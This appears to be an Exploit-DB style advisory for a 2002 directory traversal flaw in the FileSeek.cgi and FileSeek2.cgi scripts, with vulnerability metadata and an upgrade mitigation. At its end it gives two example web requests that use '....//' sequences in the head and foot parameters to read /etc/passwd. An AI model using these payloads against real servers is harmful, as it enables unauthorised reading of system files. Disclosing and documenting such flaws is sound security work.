header-logo
Suggest Exploit
vendor:
FileSeek
by:
Craig Patchett
7.5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: FileSeek
Affected Version From: FileSeek.cgi and FileSeek2.cgi
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:craig_patchett:fileseek
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

FileSeek File Disclosure Vulnerability

FileSeek.cgi and FileSeek2.cgi are prone to a file disclosure vulnerability. It is possible for a remote attacker to submit a maliciously crafted web request which is capable of breaking out of the wwwroot directory and browsing arbitrary web-readable files on a host running the vulnerable script.

Mitigation:

Upgrade to the latest version of FileSeek.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6784/info

FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server.

FileSeek.cgi and FileSeek2.cgi are prone to a file disclosure vulnerability. It is possible for a remote attacker to submit a maliciously crafted web request which is capable of breaking out of the wwwroot directory and browsing arbitrary web-readable files on a host running the vulnerable script.

http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
//....//etc/passwd&foot=